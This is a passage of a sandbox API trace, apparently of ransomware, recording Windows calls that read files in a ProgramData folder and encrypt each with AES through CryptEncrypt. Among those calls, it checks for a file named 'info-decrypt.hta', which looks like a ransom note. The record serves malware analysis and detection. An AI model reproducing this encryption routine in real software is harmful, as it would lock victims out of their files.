fInfoLevelId=0x0, lpFileInformation=0x375aa64 | out: lpFileInformation=0x375aa64*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f15ee9d, ftCreationTime.dwHighDateTime=0x1ca040c, ftLastAccessTime.dwLowDateTime=0x5f15ee9d, ftLastAccessTime.dwHighDateTime=0x1ca040c, ftLastWriteTime.dwLowDateTime=0xc7c0ee1d, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0x10654)) returned 1 [0179.215] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691f2b0) returned 1 [0179.215] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_property.ico", nBufferLength=0x105, lpBuffer=0x691ecf4, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_property.ico", lpFilePart=0x0) returned 0x63 [0179.215] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x691f1e8) returned 1 [0179.215] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_property.ico" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_property.ico"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0179.215] GetFileType (hFile=0x264) returned 0x1 [0179.215] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691f1e4) returned 1 [0179.216] GetFileType (hFile=0x264) returned 0x1 [0179.216] GetFileSize (in: hFile=0x264, lpFileSizeHigh=0x691f2f0 | out: lpFileSizeHigh=0x691f2f0*=0x0) returned 0x10654 [0179.216] ReadFile (in: hFile=0x264, lpBuffer=0x375acfc, nNumberOfBytesToRead=0x10654, lpNumberOfBytesRead=0x691f29c, lpOverlapped=0x0 | out: lpBuffer=0x375acfc*, lpNumberOfBytesRead=0x691f29c*=0x10654, lpOverlapped=0x0) returned 1 [0179.777] CloseHandle (hObject=0x264) returned 1 [0179.778] CryptAcquireContextW (in: phProv=0x691f23c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x691f23c*=0x66bab80) returned 1 [0179.779] CryptGenRandom (in: hProv=0x66bab80, dwLen=0x10, pbBuffer=0x3623724 | out: pbBuffer=0x3623724) returned 1 [0181.864] CryptImportKey (in: hProv=0x66bab80, pbData=0x3716e00, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x691f20c | out: phKey=0x691f20c*=0xb7fad0) returned 1 [0181.865] CryptContextAddRef (hProv=0x66bab80, pdwReserved=0x0, dwFlags=0x0) returned 1 [0181.865] CryptContextAddRef (hProv=0x66bab80, pdwReserved=0x0, dwFlags=0x0) returned 1 [0181.865] CryptDuplicateKey (in: hKey=0xb7fad0, pdwReserved=0x0, dwFlags=0x0, phKey=0x691f1fc | out: phKey=0x691f1fc*=0xb7f610) returned 1 [0181.865] CryptContextAddRef (hProv=0x66bab80, pdwReserved=0x0, dwFlags=0x0) returned 1 [0181.865] CryptSetKeyParam (hKey=0xb7f610, dwParam=0x4, pbData=0x3716ee0*=0x1, dwFlags=0x0) returned 1 [0181.865] CryptSetKeyParam (hKey=0xb7f610, dwParam=0x1, pbData=0x3716eac, dwFlags=0x0) returned 1 [0181.865] CryptEncrypt (in: hKey=0xb7f610, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3716ef0*, pdwDataLen=0x691f268*=0x10660, dwBufLen=0x10660 | out: pbData=0x3716ef0*, pdwDataLen=0x691f268*=0x10660) returned 1 [0181.866] CryptEncrypt (in: hKey=0xb7f610, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3727574*, pdwDataLen=0x691f270*=0x0, dwBufLen=0x10 | out: pbData=0x3727574*, pdwDataLen=0x691f270*=0x10) returned 1 [0181.868] CryptDestroyKey (hKey=0xb7fad0) returned 1 [0181.868] CryptReleaseContext (hProv=0x66bab80, dwFlags=0x0) returned 1 [0181.868] CryptReleaseContext (hProv=0x66bab80, dwFlags=0x0) returned 1 [0181.868] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_property.ico", nBufferLength=0x105, lpBuffer=0x691ece0, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_property.ico", lpFilePart=0x0) returned 0x63 [0181.868] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x691f1d4) returned 1 [0181.868] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_property.ico" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_property.ico"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0181.870] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691e010) returned 1 [0181.870] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_settings.ico", nBufferLength=0x105, lpBuffer=0x691ee00, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_settings.ico", lpFilePart=0x0) returned 0x63 [0181.870] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\info-decrypt.hta", nBufferLength=0x105, lpBuffer=0x691ee08, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\info-decrypt.hta", lpFilePart=0x0) returned 0x62 [0181.870] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x691f268) returned 1 [0181.870] GetFileAttributesExW (in: lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\info-decrypt.hta" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\info-decrypt.hta"), fInfoLevelId=0x0, lpFileInformation=0x691f2e4 | out: lpFileInformation=0x691f2e4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x21265660, ftCreationTime.dwHighDateTime=0x1d68bad, ftLastAccessTime.dwLowDateTime=0x21265660, ftLastAccessTime.dwHighDateTime=0x1d68bad, ftLastWriteTime.dwLowDateTime=0x21265660, ftLastWriteTime.dwHighDateTime=0x1d68bad, nFileSizeHigh=0x0, nFileSizeLow=0x155e)) returned 1 [0181.871] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691f264) returned 1 [0181.871] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_settings.ico", nBufferLength=0x105, lpBuffer=0x691ee08, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_settings.ico", lpFilePart=0x0) returned 0x63 [0181.871] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x691f2b4) returned 1 [0181.871] GetFileAttributesExW (in: lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_settings.ico" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_settings.ico"), fInfoLevelId=0x0, lpFileInformation=0x3728554 | out: lpFileInformation=0x3728554*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f138d40, ftCreationTime.dwHighDateTime=0x1ca040c, ftLastAccessTime.dwLowDateTime=0x5f138d40, ftLastAccessTime.dwHighDateTime=0x1ca040c, ftLastWriteTime.dwLowDateTime=0xc7c34f7b, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0xf8c2)) returned 1 [0181.871] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691f2b0) returned 1 [0181.871] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_settings.ico", nBufferLength=0x105, lpBuffer=0x691ecf4, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_settings.ico", lpFilePart=0x0) returned 0x63 [0181.871] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x691f1e8) returned 1 [0181.871] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_settings.ico" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_settings.ico"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x320 [0181.872] GetFileType (hFile=0x320) returned 0x1 [0181.872] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691f1e4) returned 1 [0181.872] GetFileType (hFile=0x320) returned 0x1 [0181.872] GetFileSize (in: hFile=0x320, lpFileSizeHigh=0x691f2f0 | out: lpFileSizeHigh=0x691f2f0*=0x0) returned 0xf8c2 [0181.872] ReadFile (in: hFile=0x320, lpBuffer=0x37287ec, nNumberOfBytesToRead=0xf8c2, lpNumberOfBytesRead=0x691f29c, lpOverlapped=0x0 | out: lpBuffer=0x37287ec*, lpNumberOfBytesRead=0x691f29c*=0xf8c2, lpOverlapped=0x0) returned 1 [0182.257] CloseHandle (hObject=0x320) returned 1 [0182.257] CryptAcquireContextW (in: phProv=0x691f23c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x691f23c*=0x66bb048) returned 1 [0182.258] CryptGenRandom (in: hProv=0x66bb048, dwLen=0x10, pbBuffer=0x3738404 | out: pbBuffer=0x3738404) returned 1 [0185.342] CryptImportKey (in: hProv=0x66bb048, pbData=0x36e7a88, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x691f20c | out: phKey=0x691f20c*=0xb7f5d0) returned 1 [0185.342] CryptContextAddRef (hProv=0x66bb048, pdwReserved=0x0, dwFlags=0x0) returned 1 [0185.343] CryptContextAddRef (hProv=0x66bb048, pdwReserved=0x0, dwFlags=0x0) returned 1 [0185.343] CryptDuplicateKey (in: hKey=0xb7f5d0, pdwReserved=0x0, dwFlags=0x0, phKey=0x691f1fc | out: phKey=0x691f1fc*=0xb7f210) returned 1 [0185.343] CryptContextAddRef (hProv=0x66bb048, pdwReserved=0x0, dwFlags=0x0) returned 1 [0185.343] CryptSetKeyParam (hKey=0xb7f210, dwParam=0x4, pbData=0x36e7b68*=0x1, dwFlags=0x0) returned 1 [0185.343] CryptSetKeyParam (hKey=0xb7f210, dwParam=0x1, pbData=0x36e7b34, dwFlags=0x0) returned 1 [0185.343] CryptEncrypt (in: hKey=0xb7f210, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x36e7b78*, pdwDataLen=0x691f268*=0xf8d0, dwBufLen=0xf8d0 | out: pbData=0x36e7b78*, pdwDataLen=0x691f268*=0xf8d0) returned 1 [0185.344] CryptEncrypt (in: hKey=0xb7f210, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x36f746c*, pdwDataLen=0x691f270*=0x0, dwBufLen=0x10 | out: pbData=0x36f746c*, pdwDataLen=0x691f270*=0x10) returned 1 [0185.345] CryptDestroyKey (hKey=0xb7f5d0) returned 1 [0185.345] CryptReleaseContext (hProv=0x66bb048, dwFlags=0x0) returned 1 [0185.345] CryptReleaseContext (hProv=0x66bb048, dwFlags=0x0) returned 1 [0185.345] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_settings.ico", nBufferLength=0x105, lpBuffer=0x691ece0, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_settings.ico", lpFilePart=0x0) returned 0x63 [0185.627] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x691f1d4) returned 1 [0185.628] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_settings.ico" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_settings.ico"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0185.633] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691e010) returned 1 [0185.633] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\tasks.xml", nBufferLength=0x105, lpBuffer=0x691ee00, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\tasks.xml", lpFilePart=0x0) returned 0x5b [0185.633] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\info-decrypt.hta", nBufferLength=0x105, lpBuffer=0x691ee08, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\info-decrypt.hta", lpFilePart=0x0) returned 0x62 [0185.633] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x691f268) returned 1 [0185.633] GetFileAttributesExW (in: lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\info-decrypt.hta" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\info-decrypt.hta"), fInfoLevelId=0x0, lpFileInformation=0x691f2e4 | out: lpFileInformation=0x691f2e4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x21265660, ftCreationTime.dwHighDateTime=0x1d68bad, ftLastAccessTime.dwLowDateTime=0x21265660, ftLastAccessTime.dwHighDateTime=0x1d68bad, ftLastWriteTime.dwLowDateTime=0x21265660, ftLastWriteTime.dwHighDateTime=0x1d68bad, nFileSizeHigh=0x0, nFileSizeLow=0x155e)) returned 1 [0185.634] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691f264) returned 1 [0185.634] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\tasks.xml", nBufferLength=0x105, lpBuffer=0x691ee08, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\tasks.xml", lpFilePart=0x0) returned 0x5b [0185.634] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x691f2b4) returned 1 [0185.634] GetFileAttributesExW (in: lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\tasks.xml" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\tasks.xml"), fInfoLevelId=0x0, lpFileInformation=0x37af630 | out: lpFileInformation=0x37af630*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f054512, ftCreationTime.dwHighDateTime=0x1ca040c, ftLastAccessTime.dwLowDateTime=0x5f054512, ftLastAccessTime.dwHighDateTime=0x1ca040c, ftLastWriteTime.dwLowDateTime=0xc7d3f90d, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0x2c64)) returned 1 [0186.017] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691f2b0) returned 1 [0186.017] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\tasks.xml", nBufferLength=0x105, lpBuffer=0x691ecf4, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\tasks.xml", lpFilePart=0x0) returned 0x5b [0186.017] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x691f1e8) returned 1 [0186.017] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\tasks.xml" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\tasks.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x4a8 [0186.023] GetFileType (hFile=0x4a8) returned 0x1 [0186.023] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691f1e4) returned 1 [0186.023] GetFileType (hFile=0x4a8) returned 0x1 [0186.023] GetFileSize (in: hFile=0x4a8, lpFileSizeHigh=0x691f2f0 | out: lpFileSizeHigh=0x691f2f0*=0x0) returned 0x2c64 [0186.023] ReadFile (in: hFile=0x4a8, lpBuffer=0x37cd7a4, nNumberOfBytesToRead=0x2c64, lpNumberOfBytesRead=0x691f29c, lpOverlapped=0x0 | out: lpBuffer=0x37cd7a4*, lpNumberOfBytesRead=0x691f29c*=0x2c64, lpOverlapped=0x0) returned 1 [0186.026] CloseHandle (hObject=0x4a8) returned 1 [0186.026] CryptAcquireContextW (in: phProv=0x691f23c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x691f23c*=0x66bb0d0) returned 1 [0186.027] CryptGenRandom (in: hProv=0x66bb0d0, dwLen=0x10, pbBuffer=0x37d0acc | out: pbBuffer=0x37d0acc) returned 1 [0187.733] CryptImportKey (in: hProv=0x66bb0d0, pbData=0x363d814, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x691f20c | out: phKey=0x691f20c*=0xb7f550) returned 1 [0187.733] CryptContextAddRef (hProv=0x66bb0d0, pdwReserved=0x0, dwFlags=0x0) returned 1 [0187.733] CryptContextAddRef (hProv=0x66bb0d0, pdwReserved=0x0, dwFlags=0x0) returned 1 [0187.733] CryptDuplicateKey (in: hKey=0xb7f550, pdwReserved=0x0, dwFlags=0x0, phKey=0x691f1fc | out: phKey=0x691f1fc*=0xb7f4d0) returned 1 [0187.733] CryptContextAddRef (hProv=0x66bb0d0, pdwReserved=0x0, dwFlags=0x0) returned 1 [0187.733] CryptSetKeyParam (hKey=0xb7f4d0, dwParam=0x4, pbData=0x363d8f4*=0x1, dwFlags=0x0) returned 1 [0187.733] CryptSetKeyParam (hKey=0xb7f4d0, dwParam=0x1, pbData=0x363d8c0, dwFlags=0x0) returned 1 [0187.733] CryptEncrypt (in: hKey=0xb7f4d0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x363d904*, pdwDataLen=0x691f268*=0x2c70, dwBufLen=0x2c70 | out: pbData=0x363d904*, pdwDataLen=0x691f268*=0x2c70) returned 1 [0187.733] CryptEncrypt (in: hKey=0xb7f4d0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3640598*, pdwDataLen=0x691f270*=0x0, dwBufLen=0x10 | out: pbData=0x3640598*, pdwDataLen=0x691f270*=0x10) returned 1 [0187.734] CryptDestroyKey (hKey=0xb7f550) returned 1 [0187.734] CryptReleaseContext (hProv=0x66bb0d0, dwFlags=0x0) returned 1 [0187.734] CryptReleaseContext (hProv=0x66bb0d0, dwFlags=0x0) returned 1 [0187.734] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\tasks.xml", nBufferLength=0x105, lpBuffer=0x691ece0, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\tasks.xml", lpFilePart=0x0) returned 0x5b [0187.735] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x691f1d4) returned 1 [0187.735] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\tasks.xml" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\tasks.xml"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0187.736] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691e010) returned 1 [0187.736] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x691f33c) returned 1 [0187.736] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-US", nBufferLength=0x105, lpBuffer=0x691ee44, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-US", lpFilePart=0x0) returned 0x57 [0187.736] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-US\\", nBufferLength=0x105, lpBuffer=0x691ee18, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-US\\", lpFilePart=0x0) returned 0x58 [0187.736] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-US\\*", lpFindFileData=0x691f064 | out: lpFindFileData=0x691f064*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1d91b669, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x22f23962, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1d91b669, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb7f550 [0187.737] FindNextFileW (in: hFindFile=0xb7f550, lpFindFileData=0x691f074 | out: lpFindFileData=0x691f074*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1d91b669, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x22f23962, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1d91b669, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0187.737] FindNextFileW (in: hFindFile=0xb7f550, lpFindFileData=0x691f074 | out: lpFindFileData=0x691f074*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb2a152a, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0xb5e9110, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0xb2a152a, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x5e8, dwReserved0=0x0, dwReserved1=0x0, cFileName="resource.xml", cAlternateFileName="")) returned 1 [0187.737] FindNextFileW (in: hFindFile=0xb7f550, lpFindFileData=0x691f074 | out: lpFindFileData=0x691f074*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0187.737] FindClose (in: hFindFile=0xb7f550 | out: hFindFile=0xb7f550) returned 1 [0187.737] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691f2fc) returned 1 [0187.737] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691f308) returned 1 [0187.737] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x691f33c) returned 1 [0187.741] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-US", nBufferLength=0x105, lpBuffer=0x691ee44, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-US", lpFilePart=0x0) returned 0x57 [0187.741] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-US\\", nBufferLength=0x105, lpBuffer=0x691ee18, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-US\\", lpFilePart=0x0) returned 0x58 [0187.741] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-US\\*", lpFindFileData=0x691f064 | out: lpFindFileData=0x691f064*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1d91b669, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x22f23962, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1d91b669, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb7f550 [0187.741] FindNextFileW (in: hFindFile=0xb7f550, lpFindFileData=0x691f074 | out: lpFindFileData=0x691f074*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1d91b669, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x22f23962, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1d91b669, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0187.741] FindNextFileW (in: hFindFile=0xb7f550, lpFindFileData=0x691f074 | out: lpFindFileData=0x691f074*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb2a152a, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0xb5e9110, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0xb2a152a, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x5e8, dwReserved0=0x0, dwReserved1=0x0, cFileName="resource.xml", cAlternateFileName="")) returned 1 [0187.742] FindNextFileW (in: hFindFile=0xb7f550, lpFindFileData=0x691f074 | out: lpFindFileData=0x691f074*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb2a152a, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0xb5e9110, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0xb2a152a, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x5e8, dwReserved0=0x0, dwReserved1=0x0, cFileName="resource.xml", cAlternateFileName="")) returned 0 [0187.742] FindClose (in: hFindFile=0xb7f550 | out: hFindFile=0xb7f550) returned 1 [0187.742] SetThreadErrorMode 